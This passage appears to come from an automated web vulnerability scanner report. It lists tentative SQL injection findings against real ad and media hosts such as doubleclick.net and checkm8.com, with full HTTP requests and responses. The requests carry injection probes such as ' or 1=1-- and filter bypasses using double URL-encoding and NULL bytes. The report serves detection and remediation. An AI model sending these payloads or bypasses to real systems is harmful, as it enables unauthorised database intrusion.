P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed05
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:07:39 GMT
Connection: close
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error ">http://abc.go.com/error </A>.<BODY></HTML>
Request 2
GET /m19952419'%20or%201%3d2--%20/images/global/generic/logo.png?v1 HTTP/1.1
Host: cdn.media.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B
|
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 17 Sep 2011 01:07:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed06 X-Powered-By: ASP.NET Cache-Expires: Sat, 17 Sep 2011 01:22:39 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Content-Length: 0 Cache-Control: max-age=274 Date: Sat, 17 Sep 2011 01:07:42 GMT Connection: close
|
1.10. http://googleads.g.doubleclick.net/pagead/ads [jsv parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://googleads.g.doubleclick.net
Path: /pagead/ads
Issue detail
The jsv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jsv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the jsv request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:56:45 GMT
Server: cafe
Cache-Control: private
Content-Length: 5631
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><script><!-- (function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstim ...[SNIP]... "?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e> ...[SNIP]...
Request 2
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:56:46 GMT
Server: cafe
Cache-Control: private
Content-Length: 3910
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 00:56:46 GMT

<!doctype html><html><head><style><!-- a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!-- (function(){window.ss=functio ...[SNIP]...
1.11. http://googleads.g.doubleclick.net/pagead/ads [slotname parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://googleads.g.doubleclick.net
Path: /pagead/ads
Issue detail
The slotname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the slotname parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00'&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:35 GMT
Server: cafe
Cache-Control: private
Content-Length: 4567
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!-- a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!-- (function(){window.ss=functio ...[SNIP]... i = d.indexOf("&");var r = '';if (ei >= 0)r = d.substring(ei, d.length);a.href = c + t + r; } else {a.href += "&clkt=" + t;}}return true;}(function(){var f=function(){var a=-1;try{htet()}catch(b){if(b.stack){var c=b.stack,a=c.split(" at").length-1;a==0&&(a=c.split(")@").length-1);a=a> ...[SNIP]...
Request 2
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00''&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:00:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 4052
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 01:00:37 GMT

<!doctype html><html><head><style><!-- a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!-- (function(){window.ss=functio ...[SNIP]...
1.12. http://googleads.g.doubleclick.net/pagead/ads [url parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://googleads.g.doubleclick.net
Path: /pagead/ads
Issue detail
The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00'&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:20 GMT
Server: cafe
Cache-Control: private
Content-Length: 5987
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerifyTag - DFA --> <!-- Copyright 2009 D ...[SNIP]... ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00''&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2
HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:55:21 GMT
Server: cafe
Cache-Control: private
Content-Length: 3806
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!-- a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!-- (function(){window.ss=functio ...[SNIP]...
1.13. http://q1.checkm8.com/adam/detect [C cookie]
Summary
Severity: High
Confidence: Tentative
Host: http://q1.checkm8.com
Path: /adam/detect
Issue detail
The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t'%20and%201%3d1--%20; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: A=dvV7X9wQ0M8MvENT06Sba;Path=/;
Set-cookie: C=oBK8X9we5HXUcgaJa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:15 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143300170/1217096312/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2
GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t'%20and%201%3d2--%20; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=oBK8X9we5HXUcgaJa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:54:15 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143300170/1217096312/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.14. http://q1.checkm8.com/adam/detect [WIDTH_RANGE parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://q1.checkm8.com
Path: /adam/detect
Issue detail
The WIDTH_RANGE parameter appears to be vulnerable to SQL injection attacks. The payloads 20440401'%20or%201%3d1--%20 and 20440401'%20or%201%3d2--%20 were each submitted in the WIDTH_RANGE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/detect?cat=Boston_Herald.Track.Front&page=6802504919469357&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D20440401'%20or%201%3d1--%20&DATE=01110917&HOUR=01&RES=RS21&ORD=6767618621233851&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9wOL36ZvENT06Sba; C=ouX7X9wuHKW7cgaJa4OQ95t

Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:29:51 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dvV7X9wDYV63vENT06Sba;Path=/;
Set-cookie: C=ofT8X9w5U7VGdga6b4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:03:11 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174630063/1248394023/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2
GET /adam/detect?cat=Boston_Herald.Track.Front&page=6802504919469357&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D20440401'%20or%201%3d2--%20&DATE=01110917&HOUR=01&RES=RS21&ORD=6767618621233851&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9wOL36ZvENT06Sba; C=ouX7X9wuHKW7cgaJa4OQ95t

Response 2
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:29:52 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: C=ogT8X9w5U7VGdga7b4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:03:12 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 174630063/1248394023/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.15. http://q1.checkm8.com/adam/detect [cat parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://q1.checkm8.com
Path: /adam/detect
Issue detail
The cat parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/detect?cat=Boston_Herald.Track.Front'%20and%201%3d1--%20&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response 1
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:20:06 GMT
Server: Apache
